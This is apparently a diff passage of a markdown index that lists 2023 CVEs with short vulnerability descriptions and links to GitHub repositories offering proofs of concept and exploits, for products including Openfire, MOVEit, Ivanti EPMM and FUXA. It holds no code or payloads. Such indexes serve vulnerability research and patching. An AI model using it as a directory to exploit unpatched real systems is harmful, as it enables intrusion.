+- [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419)
+- [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419)
+
+### CVE-2023-31446 (2024-01-10)
+
+In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.
+
+
+- [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution)
+
+### CVE-2023-31546 (2023-12-14)
+
+Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature.
+
+
+- [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546)
+
+### CVE-2023-31704 (2023-07-13)
+
+Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.
+
+
+- [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704)
+
+### CVE-2023-31705 (2023-07-13)
+
+A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter.
+
+
+- [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705)
+
+### CVE-2023-31716 (2023-09-21)
+
+FUXA <= 1.1.12 has a Local File Inclusion vulnerability via file=fuxa.log
+
+
+- [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716)
+
+### CVE-2023-31717 (2023-09-21)
+
+A SQL Injection attack in FUXA <= 1.1.12 allows exfiltration of confidential information from the database.
+
+
+- [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717)
+
+### CVE-2023-31718 (2023-09-21)
+
+FUXA <= 1.1.12 is vulnerable to Local via Inclusion via /api/download.
+
+
+- [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718)
+
+### CVE-2023-31719 (2023-09-21)
+
+FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin.
+
+
+- [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719)
+
+### CVE-2023-31753 (2023-07-20)
+
+SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.
+
+
+- [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753)
+
+### CVE-2023-31756 (2023-05-19)
+
+A command injection vulnerability exists in the administrative web portal in TP-Link Archer VR1600V devices running firmware Versions <= 0.1.0. 0.9.1 v5006.0 Build 220518 Rel.32480n which allows remote attackers, authenticated to the administrative web portal as an administrator user to open an operating system level shell via the 'X_TP_IfName' parameter.
+
+
+- [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow)
+
+### CVE-2023-32031 (2023-06-14)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031)
+
+### CVE-2023-32117
+- [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117)
+
+### CVE-2023-32233 (2023-05-08)
+
+In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.
+
+
+- [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233)
+- [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233)
+
+### CVE-2023-32235 (2023-05-05)
+
+Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
+
+
+- [VEEXH/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/VEEXH/Ghost-Path-Traversal-CVE-2023-32235-)
+
+### CVE-2023-32243 (2023-05-12)
+
+Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
+
+
+- [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243)
+- [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243)
+
+### CVE-2023-32314 (2023-05-15)
+
+vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.
+
+
+- [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure)
+
+### CVE-2023-32315 (2023-05-26)
+
+Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.
+
+
+- [ThatNotEasy/CVE-2023-32315](https://github.com/ThatNotEasy/CVE-2023-32315)
+- [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC)
+- [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315)
+- [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-)
+- [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT)
+
+### CVE-2023-32364 (2023-07-27)
+
+A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.
+
+
+- [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape)
+
+### CVE-2023-32407 (2023-06-23)
+
+A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences.
+
+
+- [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal)
+
+### CVE-2023-32422 (2023-06-23)
+
+This issue was addressed by adding additional SQLite logging restrictions. This issue is fixed in iOS 16.5 and iPadOS 16.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences.
+
+
+- [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite)
+
+### CVE-2023-32560 (2023-08-10)
+
+An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in service disruption or arbitrary code execution.\n\nThanks to a Researcher at Tenable for finding and reporting.\n\nFixed in version 6.4.1.
+
+
+- [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560)
+
+### CVE-2023-32571 (2023-06-22)
+
+Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.
+
+
+- [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC)
+- [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC)
+
+### CVE-2023-32629 (2023-07-26)
+
+Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels
+
+
+- [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay)
+- [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation)
+- [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE)
+- [xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC)
+
+### CVE-2023-32681 (2023-05-26)
+
+Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n
+
+
+- [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681)
+
+### CVE-2023-32707 (2023-06-01)
+
+In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
+
+
+- [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707)
+
+### CVE-2023-32749 (2023-06-08)
+
+Pydio Cells allows users by default to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.
+
+
+- [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749)
+
+### CVE-2023-32784 (2023-05-15)
+
+In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.
+
+
+- [dawnl3ss/CVE-2023-32784](https://github.com/dawnl3ss/CVE-2023-32784)
+- [ValentinPundikov/poc-CVE-2023-32784](https://github.com/ValentinPundikov/poc-CVE-2023-32784)
+- [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784)
+
+### CVE-2023-32961 (2023-06-12)
+
+Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Katie Seaborn Zotpress plugin <= 7.3.3 versions.
+
+
+- [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961)
+
+### CVE-2023-33105 (2024-03-04)
+
+Transient DOS in WLAN Host and Firmware when large number of open authentication frames are sent with an invalid transaction sequence number.
+
+
+- [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware)
+
+### CVE-2023-33242 (2023-08-09)
+
+Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature.
+
+
+- [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242)
+
+### CVE-2023-33246 (2023-05-24)
+
+For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. \n\nSeveral components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. \n\nTo prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n\n\n\n\n\n\n\n\n\n\n\n
+
+
+- [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246)
+- [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf)
+- [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246)
+- [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP)
+- [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246)
+
+### CVE-2023-33264 (2023-05-22)
+
+In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets.
+
+
+- [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2)
+- [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1)
+- [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3)
+
+### CVE-2023-33517 (2023-10-23)
+
+carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System).
+
+
+- [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517)
+
+### CVE-2023-33592 (2023-06-28)
+
+Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.
+
+
+- [FuckingHack3r/CVE-2023-33592](https://github.com/FuckingHack3r/CVE-2023-33592)
+
+### CVE-2023-33668 (2023-07-12)
+
+DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers.
+
+
+- [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668)
+
+### CVE-2023-33733 (2023-06-05)
+
+Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
+
+
+- [hoangbui24/CVE-2023-33733](https://github.com/hoangbui24/CVE-2023-33733)
+- [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab)
+- [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733)
+- [L41KAA/CVE-2023-33733-Exploit-PoC](https://github.com/L41KAA/CVE-2023-33733-Exploit-PoC)
+
+### CVE-2023-33747 (2023-06-06)
+
+CloudPanel v2.2.2 allows attackers to execute a path traversal.
+
+
+- [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747)
+
+### CVE-2023-33768 (2023-07-13)
+
+Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file.
+
+
+- [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768)
+
+### CVE-2023-33831 (2023-09-18)
+
+A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
+
+
+- [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831)
+
+### CVE-2023-33902 (2023-07-12)
+
+In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.
+
+
+- [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file)
+
+### CVE-2023-34034 (2023-07-19)
+
+Using "**" as a pattern in Spring Security configuration \nfor WebFlux creates a mismatch in pattern matching between Spring \nSecurity and Spring WebFlux, and the potential for a security bypass.\n\n
+
+
+- [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034)
+
+### CVE-2023-34035 (2023-07-18)
+
+Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.)\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * Spring MVC is on the classpath\n * Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet)\n * The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints\n\n\nAn application is not vulnerable if any of the following is true:\n\n * The application does not have Spring MVC on the classpath\n * The application secures no servlets other than Spring MVC’s DispatcherServlet\n * The application uses requestMatchers(String) only for Spring MVC endpoints\n\n\n\n
+
+
+- [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations)
+
+### CVE-2023-34039 (2023-08-29)
+
+Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.
+
+
+- [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039)
+- [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039)
+- [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039)
+- [syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039)
+- [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039)
+
+### CVE-2023-34040 (2023-08-24)
+
+In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record\n * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true.\n * The user allows untrusted sources to publish to a Kafka topic\n\n\nBy default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.\n\n\n
+
+
+- [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040)
+- [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040)
+- [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040)
+- [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040)
+
+### CVE-2023-34050 (2023-10-19)
+
+\n\n\n\n\n\n\n\n\n\nIn spring AMQP versions 1.0.0 to\n2.4.16 and 3.0.0 to 3.0.9 , allowed list patterns for deserializable class\nnames were added to Spring AMQP, allowing users to lock down deserialization of\ndata in messages from untrusted sources; however by default, when no allowed\nlist was provided, all classes could be deserialized.\n\n\n\nSpecifically, an application is\nvulnerable if\n\n\n\n\n * the\n SimpleMessageConverter or SerializerMessageConverter is used\n\n * the user\n does not configure allowed list patterns\n\n * untrusted\n message originators gain permissions to write messages to the RabbitMQ\n broker to send malicious content\n\n\n\n\n\n\n\n\n\n
+
+
+- [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization)
+
+### CVE-2023-34051 (2023-10-20)
+
+VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.\n
+
+
+- [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051)
+
+### CVE-2023-34092 (2023-06-01)
+
+Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vite Server Options (`server.fs.deny`) can be bypassed using double forward-slash (//) allows any unauthenticated user to read file from the Vite root-path of the application including the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). Only users explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected, and only files in the immediate Vite project root folder could be exposed. This issue is fixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5, vite@3.2.7, and vite@2.9.16.
+
+
+- [FlapyPan/test-cve-2023-34092](https://github.com/FlapyPan/test-cve-2023-34092)
+
+### CVE-2023-34152 (2023-05-30)
+
+A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.
+
+
+- [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152)
+- [SudoIndividual/CVE-2023-34152](https://github.com/SudoIndividual/CVE-2023-34152)
+
+### CVE-2023-34212 (2023-06-12)
+
+The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.\n\nThe resolution validates the JNDI URL and restricts locations to a set of allowed schemes.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n
+
+
+- [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212)
+
+### CVE-2023-34312 (2023-06-01)
+
+In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition.
+
+
+- [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp)
+
+### CVE-2023-34362 (2023-06-02)
+
+In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.
+
+
+- [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362)
+- [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362)
+- [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit)
+- [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362)
+
+### CVE-2023-34458 (2023-07-13)
+
+mx-chain-go is the official implementation of the MultiversX blockchain protocol, written in golang. When executing a relayed transaction, if the inner transaction failed, it would have increased the inner transaction's sender account nonce. This could have contributed to a limited DoS attack on a targeted account. The fix is a breaking change so a new flag `RelayedNonceFixEnableEpoch` was needed. This was a strict processing issue while validating blocks on a chain. This vulnerability has been patched in version 1.4.17.
+
+
+- [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2)
+- [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1)
+- [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3)
+
+### CVE-2023-34468 (2023-06-12)
+
+The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.\n\nThe resolution validates the Database URL and rejects H2 JDBC locations.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n
+
+
+- [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468)
+
+### CVE-2023-34634 (2023-08-01)
+
+Greenshot 1.2.10 and below allows arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened.
+
+
+- [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634)
+
+### CVE-2023-34845 (2023-06-16)
+
+Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).
+
+
+- [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845)
+
+### CVE-2023-34853 (2023-08-22)
+
+Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable.
+
+
+- [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853)
+
+### CVE-2023-34960 (2023-08-01)
+
+A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
+
+
+- [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960)
+- [YongYe-Security/CVE-2023-34960](https://github.com/YongYe-Security/CVE-2023-34960)
+- [ThatNotEasy/CVE-2023-34960](https://github.com/ThatNotEasy/CVE-2023-34960)
+- [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960)
+- [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex)
+
+### CVE-2023-34992 (2023-10-10)
+
+A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests.
+
+
+- [horizon3ai/CVE-2023-34992](https://github.com/horizon3ai/CVE-2023-34992)
+- [d0rb/CVE-2023-34992-Checker](https://github.com/d0rb/CVE-2023-34992-Checker)
+
+### CVE-2023-35001 (2023-07-05)
+
+Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace
+
+
+- [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001)
+- [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-)
+- [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001)
+
+### CVE-2023-35078 (2023-07-25)
+
+An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.
+
+
+- [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC)
+- [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078)
+- [raytheon0x21/CVE-2023-35078](https://github.com/raytheon0x21/CVE-2023-35078)
+- [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078)
+- [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit)
+- [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078)
+- [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078)
+
+### CVE-2023-35080 (2023-11-14)
+
+A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure.
+
+
+- [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation)
+
+### CVE-2023-35082 (2023-08-15)
+
+An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.
+
+
+- [Chocapikk/CVE-2023-35082](https://github.com/Chocapikk/CVE-2023-35082)
+
+### CVE-2023-35086 (2023-07-21)
+
+\nIt is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.\n\nThis issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.\n\n
+
+
+- [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC)
+
+### CVE-2023-35636 (2023-12-12)
+
+Microsoft Outlook Information Disclosure Vulnerability
+
+
+- [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636)
+
+### CVE-2023-35671 (2023-09-11)
+
+In onHostEmulationData of HostEmulationManager.java, there is a possible way for a general purpose NFC reader to read the full card number and expiry details when the device is in locked screen mode due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671)
+
+### CVE-2023-35674 (2023-09-11)
+
